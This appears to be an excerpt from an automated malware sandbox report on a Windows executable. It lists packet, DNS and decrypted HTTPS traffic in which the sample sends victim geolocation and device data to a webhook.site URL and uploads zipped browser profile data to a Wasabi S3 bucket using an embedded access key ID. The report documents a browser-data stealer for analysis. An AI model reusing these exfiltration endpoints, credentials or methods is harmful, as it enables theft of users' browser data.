Aug 30, 2024 03:26:19.711141109 CEST	49742	443	192.168.2.4	46.4.105.116
Aug 30, 2024 03:26:19.711144924 CEST	443	49742	46.4.105.116	192.168.2.4
Aug 30, 2024 03:26:19.712044954 CEST	443	49742	46.4.105.116	192.168.2.4
Aug 30, 2024 03:26:19.712117910 CEST	49742	443	192.168.2.4	46.4.105.116
Aug 30, 2024 03:26:19.722383976 CEST	49742	443	192.168.2.4	46.4.105.116
Aug 30, 2024 03:26:19.722450972 CEST	443	49742	46.4.105.116	192.168.2.4
Aug 30, 2024 03:26:19.722485065 CEST	49742	443	192.168.2.4	46.4.105.116
Aug 30, 2024 03:26:19.764509916 CEST	443	49742	46.4.105.116	192.168.2.4
Aug 30, 2024 03:26:19.769531965 CEST	49742	443	192.168.2.4	46.4.105.116
Aug 30, 2024 03:26:19.769539118 CEST	443	49742	46.4.105.116	192.168.2.4
Aug 30, 2024 03:26:19.817105055 CEST	49742	443	192.168.2.4	46.4.105.116
Aug 30, 2024 03:26:21.536876917 CEST	443	49742	46.4.105.116	192.168.2.4
Aug 30, 2024 03:26:21.536968946 CEST	443	49742	46.4.105.116	192.168.2.4
Aug 30, 2024 03:26:21.537038088 CEST	49742	443	192.168.2.4	46.4.105.116
Aug 30, 2024 03:26:21.537329912 CEST	49742	443	192.168.2.4	46.4.105.116
Aug 30, 2024 03:26:21.537329912 CEST	49742	443	192.168.2.4	46.4.105.116
Aug 30, 2024 03:26:21.537342072 CEST	443	49742	46.4.105.116	192.168.2.4
Aug 30, 2024 03:26:22.583203077 CEST	49744	443	192.168.2.4	46.4.105.116
Aug 30, 2024 03:26:22.583251953 CEST	443	49744	46.4.105.116	192.168.2.4
Aug 30, 2024 03:26:22.583363056 CEST	49744	443	192.168.2.4	46.4.105.116
Aug 30, 2024 03:26:22.584244013 CEST	49744	443	192.168.2.4	46.4.105.116
Aug 30, 2024 03:26:22.584259033 CEST	443	49744	46.4.105.116	192.168.2.4
Aug 30, 2024 03:26:23.226798058 CEST	443	49744	46.4.105.116	192.168.2.4
Aug 30, 2024 03:26:23.240492105 CEST	49744	443	192.168.2.4	46.4.105.116
Aug 30, 2024 03:26:23.240520000 CEST	443	49744	46.4.105.116	192.168.2.4
Aug 30, 2024 03:26:23.257473946 CEST	49744	443	192.168.2.4	46.4.105.116
Aug 30, 2024 03:26:23.257483006 CEST	443	49744	46.4.105.116	192.168.2.4
Aug 30, 2024 03:26:23.258471012 CEST	443	49744	46.4.105.116	192.168.2.4
Aug 30, 2024 03:26:23.258528948 CEST	49744	443	192.168.2.4	46.4.105.116
Aug 30, 2024 03:26:23.467969894 CEST	49744	443	192.168.2.4	46.4.105.116
Aug 30, 2024 03:26:23.468074083 CEST	443	49744	46.4.105.116	192.168.2.4
Aug 30, 2024 03:26:23.468106031 CEST	49744	443	192.168.2.4	46.4.105.116
Aug 30, 2024 03:26:23.512506962 CEST	443	49744	46.4.105.116	192.168.2.4
Aug 30, 2024 03:26:23.520689011 CEST	49744	443	192.168.2.4	46.4.105.116
Aug 30, 2024 03:26:23.520700932 CEST	443	49744	46.4.105.116	192.168.2.4
Aug 30, 2024 03:26:23.563855886 CEST	49744	443	192.168.2.4	46.4.105.116
Aug 30, 2024 03:26:25.299568892 CEST	443	49744	46.4.105.116	192.168.2.4
Aug 30, 2024 03:26:25.299662113 CEST	443	49744	46.4.105.116	192.168.2.4
Aug 30, 2024 03:26:25.299860954 CEST	49744	443	192.168.2.4	46.4.105.116
Aug 30, 2024 03:26:25.299899101 CEST	443	49744	46.4.105.116	192.168.2.4
Aug 30, 2024 03:26:25.299911976 CEST	49744	443	192.168.2.4	46.4.105.116
Aug 30, 2024 03:26:25.299918890 CEST	443	49744	46.4.105.116	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 30, 2024 03:26:01.593878031 CEST	62308	53	192.168.2.4	1.1.1.1
Aug 30, 2024 03:26:01.601119041 CEST	53	62308	1.1.1.1	192.168.2.4
Aug 30, 2024 03:26:02.446497917 CEST	58017	53	192.168.2.4	1.1.1.1
Aug 30, 2024 03:26:02.453692913 CEST	53	58017	1.1.1.1	192.168.2.4
Aug 30, 2024 03:26:12.230664968 CEST	57351	53	192.168.2.4	1.1.1.1
Aug 30, 2024 03:26:12.239460945 CEST	53	57351	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Aug 30, 2024 03:26:01.593878031 CEST	192.168.2.4	1.1.1.1	0xb8bf	Standard query (0)	ipapi.co	A (IP address)	IN (0x0001)	false
Aug 30, 2024 03:26:02.446497917 CEST	192.168.2.4	1.1.1.1	0x8fbe	Standard query (0)	webhook.site	A (IP address)	IN (0x0001)	false
Aug 30, 2024 03:26:12.230664968 CEST	192.168.2.4	1.1.1.1	0x4acc	Standard query (0)	s3.ap-southeast-1.wasabisys.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Aug 30, 2024 03:26:01.601119041 CEST	1.1.1.1	192.168.2.4	0xb8bf	No error (0)	ipapi.co		104.26.8.44	A (IP address)	IN (0x0001)	false
Aug 30, 2024 03:26:01.601119041 CEST	1.1.1.1	192.168.2.4	0xb8bf	No error (0)	ipapi.co		104.26.9.44	A (IP address)	IN (0x0001)	false
Aug 30, 2024 03:26:01.601119041 CEST	1.1.1.1	192.168.2.4	0xb8bf	No error (0)	ipapi.co		172.67.69.226	A (IP address)	IN (0x0001)	false
Aug 30, 2024 03:26:02.453692913 CEST	1.1.1.1	192.168.2.4	0x8fbe	No error (0)	webhook.site		46.4.105.116	A (IP address)	IN (0x0001)	false
Aug 30, 2024 03:26:02.453692913 CEST	1.1.1.1	192.168.2.4	0x8fbe	No error (0)	webhook.site		178.63.67.153	A (IP address)	IN (0x0001)	false
Aug 30, 2024 03:26:02.453692913 CEST	1.1.1.1	192.168.2.4	0x8fbe	No error (0)	webhook.site		178.63.67.106	A (IP address)	IN (0x0001)	false
Aug 30, 2024 03:26:12.239460945 CEST	1.1.1.1	192.168.2.4	0x4acc	No error (0)	s3.ap-southeast-1.wasabisys.com	ap-southeast-1.wasabisys.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 30, 2024 03:26:12.239460945 CEST	1.1.1.1	192.168.2.4	0x4acc	No error (0)	ap-southeast-1.wasabisys.com		154.18.200.103	A (IP address)	IN (0x0001)	false
Aug 30, 2024 03:26:12.239460945 CEST	1.1.1.1	192.168.2.4	0x4acc	No error (0)	ap-southeast-1.wasabisys.com		154.18.200.102	A (IP address)	IN (0x0001)	false
Aug 30, 2024 03:26:12.239460945 CEST	1.1.1.1	192.168.2.4	0x4acc	No error (0)	ap-southeast-1.wasabisys.com		154.18.200.100	A (IP address)	IN (0x0001)	false
Aug 30, 2024 03:26:12.239460945 CEST	1.1.1.1	192.168.2.4	0x4acc	No error (0)	ap-southeast-1.wasabisys.com		154.18.200.101	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

ipapi.co

webhook.site

s3.ap-southeast-1.wasabisys.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	104.26.8.44	443	5740	C:\Users\user\Desktop\5EvHHcMjRg.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-30 01:26:02 UTC	93	OUT	GET /json/ HTTP/1.1 Host: ipapi.co User-Agent: ipapi.co/#go-v1.5 Accept-Encoding: gzip
2024-08-30 01:26:02 UTC	665	IN	HTTP/1.1 200 OK Date: Fri, 30 Aug 2024 01:26:02 GMT Content-Type: application/json Content-Length: 763 Connection: close Allow: POST, GET, OPTIONS, OPTIONS, HEAD X-Frame-Options: DENY Vary: Host, origin X-Content-Type-Options: nosniff Referrer-Policy: same-origin CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=461WiPUVYchyi4AFApRc9wQ4bRdSfqcMUT4Zqngj7TAcyzqYORPwW%2F2zsC1qQ24KGuF5t8cDnlT15hc%2F%2BKdkz0jZbgBrHPOKzZQinZA0KMd5f%2FbaQwoVnk8y"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bb0fd881ec94399-EWR
2024-08-30 01:26:02 UTC	704	IN	Data Raw: 7b 0a 20 20 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 20 20 22 6e 65 74 77 6f 72 6b 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 30 2f 32 34 22 2c 0a 20 20 20 20 22 76 65 72 73 69 6f 6e 22 3a 20 22 49 50 76 34 22 2c 0a 20 20 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 5f 63 6f 64 65 22 3a 20 22 4e 59 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 5f 6e 61 6d 65 22 3a 20 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 63 6f 75 6e Data Ascii: { "ip": "8.46.123.33", "network": "8.46.123.0/24", "version": "IPv4", "city": "New York City", "region": "New York", "region_code": "NY", "country": "US", "country_name": "United States", "country_code": "US", "coun
2024-08-30 01:26:02 UTC	59	IN	Data Raw: 69 6f 6e 22 3a 20 33 32 37 31 36 37 34 33 34 2c 0a 20 20 20 20 22 61 73 6e 22 3a 20 22 41 53 33 33 35 36 22 2c 0a 20 20 20 20 22 6f 72 67 22 3a 20 22 4c 45 56 45 4c 33 22 0a 7d Data Ascii: ion": 327167434, "asn": "AS3356", "org": "LEVEL3"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	46.4.105.116	443	5740	C:\Users\user\Desktop\5EvHHcMjRg.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-30 01:26:03 UTC	183	OUT	POST /efe6628a-60cc-4d7a-bd08-479e31e08de5 HTTP/1.1 Host: webhook.site User-Agent: Go-http-client/1.1 Content-Length: 509 Content-Type: application/json Accept-Encoding: gzip
2024-08-30 01:26:03 UTC	509	OUT	Data Raw: 7b 22 63 61 6d 70 61 69 67 6e 5f 69 64 22 3a 22 41 44 54 59 30 30 30 32 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 53 22 2c 22 64 61 74 65 74 69 6d 65 5f 75 74 63 22 3a 22 32 30 32 34 2d 30 38 2d 33 30 54 30 31 3a 32 36 3a 30 31 2e 32 38 31 31 34 31 33 5a 22 2c 22 64 65 76 69 63 65 5f 69 64 22 3a 22 37 31 34 33 34 44 35 36 2d 31 35 34 38 2d 45 44 33 44 2d 41 45 45 36 2d 43 37 35 41 45 43 44 39 33 42 46 30 22 2c 22 65 72 72 6f 72 5f 6d 65 73 73 61 67 65 22 3a 22 22 2c 22 69 70 5f 61 64 64 72 65 73 73 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 69 73 70 5f 6f 72 67 22 3a 22 4c 45 56 45 4c 33 22 2c 22 6c 61 74 69 74 75 64 65 22 3a 34 30 2e 37 37 38 2c 22 6c 6f 6e 67 69 74 75 64 65 22 Data Ascii: {"campaign_id":"ADTY0002","city":"New York City","country":"US","datetime_utc":"2024-08-30T01:26:01.2811413Z","device_id":"71434D56-1548-ED3D-AEE6-C75AECD93BF0","error_message":"","ip_address":"8.46.123.33","isp_org":"LEVEL3","latitude":40.778,"longitude"
2024-08-30 01:26:05 UTC	317	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Request-Id: 72ea8a68-ab31-493f-81b6-2cd7a2c68cee X-Token-Id: efe6628a-60cc-4d7a-bd08-479e31e08de5 Cache-Control: no-cache, private Date: Fri, 30 Aug 2024 01:26:04 GMT
2024-08-30 01:26:05 UTC	156	IN	Data Raw: 39 31 0d 0a 54 68 69 73 20 55 52 4c 20 68 61 73 20 6e 6f 20 64 65 66 61 75 6c 74 20 63 6f 6e 74 65 6e 74 20 63 6f 6e 66 69 67 75 72 65 64 2e 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 68 6f 6f 6b 2e 73 69 74 65 2f 23 21 2f 76 69 65 77 2f 65 66 65 36 36 32 38 61 2d 36 30 63 63 2d 34 64 37 61 2d 62 64 30 38 2d 34 37 39 65 33 31 65 30 38 64 65 35 22 3e 56 69 65 77 20 69 6e 20 57 65 62 68 6f 6f 6b 2e 73 69 74 65 3c 2f 61 3e 2e 0d 0a 30 0d 0a 0d 0a Data Ascii: 91This URL has no default content configured. <a href="https://webhook.site/#!/view/efe6628a-60cc-4d7a-bd08-479e31e08de5">View in Webhook.site</a>.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49732	46.4.105.116	443	5740	C:\Users\user\Desktop\5EvHHcMjRg.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-30 01:26:07 UTC	183	OUT	POST /efe6628a-60cc-4d7a-bd08-479e31e08de5 HTTP/1.1 Host: webhook.site User-Agent: Go-http-client/1.1 Content-Length: 517 Content-Type: application/json Accept-Encoding: gzip
2024-08-30 01:26:07 UTC	517	OUT	Data Raw: 7b 22 63 61 6d 70 61 69 67 6e 5f 69 64 22 3a 22 41 44 54 59 30 30 30 32 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 53 22 2c 22 64 61 74 65 74 69 6d 65 5f 75 74 63 22 3a 22 32 30 32 34 2d 30 38 2d 33 30 54 30 31 3a 32 36 3a 30 35 2e 33 35 35 36 30 33 31 5a 22 2c 22 64 65 76 69 63 65 5f 69 64 22 3a 22 37 31 34 33 34 44 35 36 2d 31 35 34 38 2d 45 44 33 44 2d 41 45 45 36 2d 43 37 35 41 45 43 44 39 33 42 46 30 22 2c 22 65 72 72 6f 72 5f 6d 65 73 73 61 67 65 22 3a 22 22 2c 22 69 70 5f 61 64 64 72 65 73 73 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 69 73 70 5f 6f 72 67 22 3a 22 4c 45 56 45 4c 33 22 2c 22 6c 61 74 69 74 75 64 65 22 3a 34 30 2e 37 37 38 2c 22 6c 6f 6e 67 69 74 75 64 65 22 Data Ascii: {"campaign_id":"ADTY0002","city":"New York City","country":"US","datetime_utc":"2024-08-30T01:26:05.3556031Z","device_id":"71434D56-1548-ED3D-AEE6-C75AECD93BF0","error_message":"","ip_address":"8.46.123.33","isp_org":"LEVEL3","latitude":40.778,"longitude"
2024-08-30 01:26:09 UTC	317	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Request-Id: d2766f0f-3a12-4ba0-b546-ef8da0895835 X-Token-Id: efe6628a-60cc-4d7a-bd08-479e31e08de5 Cache-Control: no-cache, private Date: Fri, 30 Aug 2024 01:26:08 GMT
2024-08-30 01:26:09 UTC	156	IN	Data Raw: 39 31 0d 0a 54 68 69 73 20 55 52 4c 20 68 61 73 20 6e 6f 20 64 65 66 61 75 6c 74 20 63 6f 6e 74 65 6e 74 20 63 6f 6e 66 69 67 75 72 65 64 2e 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 68 6f 6f 6b 2e 73 69 74 65 2f 23 21 2f 76 69 65 77 2f 65 66 65 36 36 32 38 61 2d 36 30 63 63 2d 34 64 37 61 2d 62 64 30 38 2d 34 37 39 65 33 31 65 30 38 64 65 35 22 3e 56 69 65 77 20 69 6e 20 57 65 62 68 6f 6f 6b 2e 73 69 74 65 3c 2f 61 3e 2e 0d 0a 30 0d 0a 0d 0a Data Ascii: 91This URL has no default content configured. <a href="https://webhook.site/#!/view/efe6628a-60cc-4d7a-bd08-479e31e08de5">View in Webhook.site</a>.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49733	46.4.105.116	443	5740	C:\Users\user\Desktop\5EvHHcMjRg.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-30 01:26:10 UTC	183	OUT	POST /efe6628a-60cc-4d7a-bd08-479e31e08de5 HTTP/1.1 Host: webhook.site User-Agent: Go-http-client/1.1 Content-Length: 516 Content-Type: application/json Accept-Encoding: gzip
2024-08-30 01:26:10 UTC	516	OUT	Data Raw: 7b 22 63 61 6d 70 61 69 67 6e 5f 69 64 22 3a 22 41 44 54 59 30 30 30 32 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 53 22 2c 22 64 61 74 65 74 69 6d 65 5f 75 74 63 22 3a 22 32 30 32 34 2d 30 38 2d 33 30 54 30 31 3a 32 36 3a 30 38 2e 34 37 30 30 37 32 5a 22 2c 22 64 65 76 69 63 65 5f 69 64 22 3a 22 37 31 34 33 34 44 35 36 2d 31 35 34 38 2d 45 44 33 44 2d 41 45 45 36 2d 43 37 35 41 45 43 44 39 33 42 46 30 22 2c 22 65 72 72 6f 72 5f 6d 65 73 73 61 67 65 22 3a 22 22 2c 22 69 70 5f 61 64 64 72 65 73 73 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 69 73 70 5f 6f 72 67 22 3a 22 4c 45 56 45 4c 33 22 2c 22 6c 61 74 69 74 75 64 65 22 3a 34 30 2e 37 37 38 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a Data Ascii: {"campaign_id":"ADTY0002","city":"New York City","country":"US","datetime_utc":"2024-08-30T01:26:08.470072Z","device_id":"71434D56-1548-ED3D-AEE6-C75AECD93BF0","error_message":"","ip_address":"8.46.123.33","isp_org":"LEVEL3","latitude":40.778,"longitude":
2024-08-30 01:26:12 UTC	317	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Request-Id: 4ae2d2f4-a6d3-403e-9196-3bb9215f88c5 X-Token-Id: efe6628a-60cc-4d7a-bd08-479e31e08de5 Cache-Control: no-cache, private Date: Fri, 30 Aug 2024 01:26:12 GMT
2024-08-30 01:26:12 UTC	156	IN	Data Raw: 39 31 0d 0a 54 68 69 73 20 55 52 4c 20 68 61 73 20 6e 6f 20 64 65 66 61 75 6c 74 20 63 6f 6e 74 65 6e 74 20 63 6f 6e 66 69 67 75 72 65 64 2e 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 68 6f 6f 6b 2e 73 69 74 65 2f 23 21 2f 76 69 65 77 2f 65 66 65 36 36 32 38 61 2d 36 30 63 63 2d 34 64 37 61 2d 62 64 30 38 2d 34 37 39 65 33 31 65 30 38 64 65 35 22 3e 56 69 65 77 20 69 6e 20 57 65 62 68 6f 6f 6b 2e 73 69 74 65 3c 2f 61 3e 2e 0d 0a 30 0d 0a 0d 0a Data Ascii: 91This URL has no default content configured. <a href="https://webhook.site/#!/view/efe6628a-60cc-4d7a-bd08-479e31e08de5">View in Webhook.site</a>.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49734	154.18.200.103	443	5740	C:\Users\user\Desktop\5EvHHcMjRg.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-30 01:26:13 UTC	588	OUT	POST /browser-profiles/20240829212611-71434D56-1548-ED3D-AEE6-C75AECD93BF0.zip?uploads= HTTP/1.1 Host: s3.ap-southeast-1.wasabisys.com User-Agent: aws-sdk-go/1.55.5 (go1.22.6; windows; 386) Content-Length: 0 Authorization: AWS4-HMAC-SHA256 Credential=28JW7MUJ64BNM9GCHFBF/20240830/ap-southeast-1/s3/aws4_request, SignedHeaders=host;x-amz-content-sha256;x-amz-date, Signature=a146e7e0769318c0299379388dc71527879c70a2b3e421dc95e7e0fba678c788 X-Amz-Content-Sha256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 X-Amz-Date: 20240830T012611Z Accept-Encoding: gzip
2024-08-30 01:26:14 UTC	393	IN	HTTP/1.1 200 OK Connection: close Date: Fri, 30 Aug 2024 01:26:14 GMT Server: WasabiS3/7.20.2957-2024-08-05-c5ee44c55d (R101-U11) x-amz-id-2: RezwtaPOUG/ZKnJF4ThRC69xcINXdJQmnppdzglOgOUwK4sJjIdgZHsALpnJIbisROJxkRtO8mTM x-amz-request-id: B4CC5779F2E6792F:B x-wasabi-cm-reference-id: 1724981172986 154.18.200.103 ConID:387950873/EngineConID:3718379/Core:101 Transfer-Encoding: chunked
2024-08-30 01:26:14 UTC	410	IN	Data Raw: 31 38 65 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 49 6e 69 74 69 61 74 65 4d 75 6c 74 69 70 61 72 74 55 70 6c 6f 61 64 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 73 33 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 2f 64 6f 63 2f 32 30 30 36 2d 30 33 2d 30 31 2f 22 3e 3c 42 75 63 6b 65 74 3e 62 72 6f 77 73 65 72 2d 70 72 6f 66 69 6c 65 73 3c 2f 42 75 63 6b 65 74 3e 3c 4b 65 79 3e 32 30 32 34 30 38 32 39 32 31 32 36 31 31 2d 37 31 34 33 34 44 35 36 2d 31 35 34 38 2d 45 44 33 44 2d 41 45 45 36 2d 43 37 35 41 45 43 44 39 33 42 46 30 2e 7a 69 70 3c 2f 4b 65 79 3e 3c 55 70 6c 6f 61 64 49 64 3e 78 65 67 42 73 4e 30 68 37 47 4b 38 54 73 62 59 48 74 58 55 5f 72 46 Data Ascii: 18e<?xml version="1.0" encoding="UTF-8"?><InitiateMultipartUploadResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/"><Bucket>browser-profiles</Bucket><Key>20240829212611-71434D56-1548-ED3D-AEE6-C75AECD93BF0.zip</Key><UploadId>xegBsN0h7GK8TsbYHtXU_rF

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49735	154.18.200.103	443	5740	C:\Users\user\Desktop\5EvHHcMjRg.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-30 01:26:15 UTC	800	OUT	PUT /browser-profiles/20240829212611-71434D56-1548-ED3D-AEE6-C75AECD93BF0.zip?partNumber=1&uploadId=xegBsN0h7GK8TsbYHtXU_rFF4rPC2_2LH9Yu8_BPdoDoOFvXyLT4HBqv_zXSu7-SihvUH-HBZN3kGSnHfVKG4JBLZ0rDdIuUMtS9KUOhMcJseIl8xj753Ke9waxkTXK2 HTTP/1.1 Host: s3.ap-southeast-1.wasabisys.com User-Agent: aws-sdk-go/1.55.5 (go1.22.6; windows; 386) Content-Length: 446151 Authorization: AWS4-HMAC-SHA256 Credential=28JW7MUJ64BNM9GCHFBF/20240830/ap-southeast-1/s3/aws4_request, SignedHeaders=content-length;content-md5;host;x-amz-content-sha256;x-amz-date, Signature=82ab21eb10dcdf8acc2c8e70150f580d3f59ac7aeebb6c35e6b086edd3d3239a Content-Md5: eGrvadcmuSt6jofUpfCu2w== X-Amz-Content-Sha256: 82324d8ed5cf99f08d401f406ba14190ad323a35406abe015b0f51f1e41d6b30 X-Amz-Date: 20240830T012613Z Accept-Encoding: gzip
2024-08-30 01:26:15 UTC	2372	OUT	Data Raw: 50 4b 03 04 14 00 08 08 08 00 42 ab 1d 59 00 00 00 00 00 00 00 00 00 00 00 00 2b 00 09 00 55 73 65 72 20 44 61 74 61 20 54 65 6d 70 5c 44 65 66 61 75 6c 74 5c 41 66 66 69 6c 69 61 74 69 6f 6e 20 44 61 74 61 62 61 73 65 55 54 05 00 01 ac 1f d1 66 ec da cd 6e e3 54 14 c0 f1 eb ba 8d db 84 d6 65 51 45 a8 12 ba d5 80 88 35 09 28 42 ac ba 80 90 9a 21 22 75 a6 69 8a e8 ca 72 93 db c1 10 c7 69 ec 8c a6 cb cc ec 79 1d 5e 60 36 b3 82 47 18 16 6c 91 d8 b1 44 ce 47 1b 67 5a 05 56 03 d1 ff 27 b5 ca f1 b1 af 8f cf 75 22 5d cb a7 27 75 3f 56 f2 32 1c 04 5e 2c 3f 15 bb 42 d3 c4 17 52 0a 21 36 84 10 39 71 2b 23 84 58 9f 8b 35 b1 dc 86 f8 f8 87 5f b7 cd bf 44 36 fb 5a 98 4f cc 5f 76 7e de 51 db fa ce 07 ef 5c e7 7e ca be ce 9d 2c 1b 00 00 00 00 f8 37 c2 2d 23 6f 59 da e8 Data Ascii: PKBY+User Data Temp\Default\Affiliation DatabaseUTfnTeQE5(B!"uiriy^`6GlDGgZV'u"]'u?V2^,?BR!69q+#X5_D6ZO_v~Q\~,7-#oY
2024-08-30 01:26:15 UTC	3558	OUT	Data Raw: 01 15 6c 0a 80 ba 96 50 d6 f4 df 8b 1f c3 bb 3f ea 2b 9e 93 8f 81 6e 09 bc b0 31 3a 1c 16 10 85 85 f0 64 9c 43 a7 73 3c cd cf db a4 53 36 e7 ac 7d 70 38 fd f4 c9 66 8a 21 8e b7 df 7f 59 38 98 e0 74 7c 4b 78 be fa 70 d4 2e 8e c6 87 67 41 72 78 f0 ef e4 f0 14 d2 1e 27 8d c1 c6 39 43 3f 1a ab 3f f0 36 47 dc 37 ac 69 da aa 85 ae 55 a2 11 65 a5 40 0a 29 36 7b ae 76 b5 ea 98 90 95 e2 72 a7 a0 96 92 8b 12 40 89 4d d7 b5 cd be e4 4a 70 55 7c 37 a4 01 a7 ac 93 ed d1 5d 06 74 fa af 59 59 c1 38 7f cc ca 4a 49 d7 ab fb 7a f5 15 00 00 ff ff 50 4b 07 08 ab 8b b1 d5 02 01 00 00 9e 01 00 00 50 4b 03 04 14 00 08 08 08 00 42 ab 1d 59 00 00 00 00 00 00 00 00 00 00 00 00 2a 00 09 00 55 73 65 72 20 44 61 74 61 20 54 65 6d 70 5c 44 65 66 61 75 6c 74 5c 42 75 64 67 65 74 44 61 Data Ascii: lP?+n1:dCs<S6}p8f!Y8t\|Kxp.gArx'9C??6G7iUe@)6{vr@MJpU\|7]tYY8JIzPKPKBY*User Data Temp\Default\BudgetDa
2024-08-30 01:26:15 UTC	4744	OUT	Data Raw: 7e 7a 34 a4 ad 81 a6 75 7a f4 04 a4 4d 8b a0 3d 3c 14 c1 a0 89 b4 e9 a2 e0 9b 26 e5 d9 5b 73 c2 69 ae e0 50 1c 77 9b ba 39 ff 98 14 7f 76 43 36 1f 0f 5e 01 00 00 ff ff 50 4b 07 08 55 9b 00 b4 a7 00 00 00 1b 01 00 00 50 4b 03 04 14 00 08 08 08 00 42 ab 1d 59 00 00 00 00 00 00 00 00 00 00 00 00 38 00 09 00 55 73 65 72 20 44 61 74 61 20 54 65 6d 70 5c 44 65 66 61 75 6c 74 5c 45 78 74 65 6e 73 69 6f 6e 20 53 63 72 69 70 74 73 5c 4d 41 4e 49 46 45 53 54 2d 30 30 30 30 30 31 55 54 05 00 01 ac 1f d1 66 9a 5a b3 f3 a8 12 03 23 a3 54 4e 6a 59 6a 4e 4a 92 9e 53 65 49 6a 79 66 71 aa 73 7e 6e 41 62 51 62 49 7e 11 13 03 33 13 0b 03 20 00 00 ff ff 50 4b 07 08 a0 1c 50 7b 2f 00 00 00 29 00 00 00 50 4b 03 04 14 00 08 08 08 00 42 ab 1d 59 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: ~z4uzM=<&[siPw9vC6^PKUPKBY8User Data Temp\Default\Extension Scripts\MANIFEST-000001UTfZ#TNjYjNJSeIjyfqs~nAbQbI~3 PKP{/)PKBY
2024-08-30 01:26:15 UTC	5930	OUT	Data Raw: 97 97 cc a8 12 3c 33 4f 21 ce a8 a1 6d 93 2b 30 d2 57 37 2a 6e d3 3f b3 68 ba 33 3f ec 5c 7a 79 38 3a 0b c2 bd ce c2 30 70 16 84 42 6a 51 04 38 0a 42 20 7e f7 02 6a 79 66 36 98 9f 99 0b 89 cf 4c 81 98 e7 36 c3 ec 1a c4 d9 6e 0f 0d 70 13 98 5d 45 3c 01 a7 58 5e 38 a7 38 81 d3 65 99 53 0a c3 b6 67 1e 8e c2 94 c2 70 6f 6a 51 38 30 a4 15 47 42 42 ee 62 c8 28 8e 84 ad c7 7f 01 07 ce 97 c2 81 0f 4a 29 e3 57 15 47 c2 bc d7 4f d3 b9 35 88 f3 5c 1e 98 eb 16 60 ae 4b f0 ce 3f 87 38 db 25 fc 81 d5 69 7f 5a b5 38 b5 24 bc 63 d5 de 48 9a 5e 12 41 d2 4a c2 a9 fc fc fd ed 9b 3f 86 cb 23 ad 80 fd 6d 88 7f 6b 40 fc a4 0e 71 a8 07 db ae 36 c1 af 5c a5 30 a3 72 18 16 d5 10 58 50 43 e8 82 6a 81 2e a8 a3 74 be 8b 0c ce 3d 81 41 ab 4a c3 